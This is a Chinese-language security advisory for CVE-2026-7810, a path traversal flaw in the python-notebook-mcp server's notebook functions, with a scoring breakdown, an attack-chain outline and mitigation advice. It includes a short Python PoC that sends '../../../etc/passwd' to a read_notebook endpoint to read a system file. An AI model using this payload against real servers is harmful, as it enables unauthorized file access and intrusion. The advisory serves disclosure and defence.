CVE-2026-7810 CVSS 7.3 高危

CVE-2026-7810 python-notebook-mcp 路径遍历漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7810

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UsamaK98 python-notebook-mcp

漏洞概述

UsamaK98/python-notebook-mcp 项目存在严重的路径遍历漏洞。该漏洞影响 `server.py` 文件中的 `create_notebook`、`read_notebook`、`edit_cell` 和 `add_cell` 等函数。由于缺乏适当的输入验证，攻击者可以通过操控相关参数发起远程攻击，绕过目录限制访问服务器上的任意文件。目前该漏洞的利用代码已被公开，且厂商尚未对此问题做出响应，风险较高。

技术细节

该漏洞的核心成因在于 UsamaK98/python-notebook-mcp 项目的服务器组件在处理用户输入时，未能有效防御路径遍历攻击。具体而言，`server.py` 文件中的 `create_notebook`、`read_notebook`、`edit_cell` 及 `add_cell` 等关键函数直接使用了用户可控的参数来构建文件系统路径，而未实施必要的路径清洗或白名单验证机制。攻击者可以通过在请求参数中插入路径遍历序列（例如 `../` 或 `..\`），突破应用程序预置的目录边界，进而访问或操作服务器上任意位置的文件。鉴于该产品采用持续交付的滚动发布模式，受影响的代码提交ID为 `a05a232815809a7e425b5fa7be26e0d4369894c2` 及其之前的版本。由于漏洞利用无需身份认证且可通过网络远程发起，结合已公开的PoC代码，该漏洞对未打补丁的系统构成了实质性的安全威胁。成功利用此漏洞可能导致敏感配置文件泄露、关键数据被篡改甚至服务中断。

攻击链分析

STEP 1

侦察

扫描目标网络，识别运行 UsamaK98 python-notebook-mcp 的服务及其开放端口。

STEP 2

武器化

构造包含路径遍历字符（如 '../' 或 '..\'）的恶意HTTP请求参数。

STEP 3

投递

将构造好的恶意请求发送至服务器的 `read_notebook`、`create_notebook` 等受影响接口。

STEP 4

利用

服务器端代码未过滤特殊字符，导致攻击者成功访问预期工作目录之外的敏感文件。

STEP 5

影响

攻击者读取服务器配置、代码或窃取敏感数据，可能导致进一步的系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-ip:port"
# Vulnerable endpoint example: read_notebook
# Path traversal payload to read /etc/passwd
payload = {
    "path": "../../../etc/passwd" 
}

try:
    # Sending request to the vulnerable API
    response = requests.get(f"{target_url}/read_notebook", params=payload)
    if response.status_code == 200:
        print("Exploit successful! Response content:")
        print(response.text)
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

UsamaK98 python-notebook-mcp <= commit a05a232815809a7e425b5fa7be26e0d4369894c2

防御指南

临时缓解措施

建议立即限制该应用的网络访问，仅在受信任的内网环境中使用。在官方修复发布前，可部署Web应用防火墙（WAF）规则，拦截包含路径遍历特征（如 "../"）的请求。同时，应密切监控服务器日志，检测是否存在异常的文件读取行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7810
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7810
3 Details https://www.cvedetails.com/cve/CVE-2026-7810/
4 VulDB https://vuldb.com/cve/CVE-2026-7810
5 Link https://github.com/UsamaK98/python-notebook-mcp/
6 Link https://github.com/UsamaK98/python-notebook-mcp/issues/5
7 Link https://vuldb.com/submit/807748
8 Link https://vuldb.com/vuln/361070
9 Link https://vuldb.com/vuln/361070/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表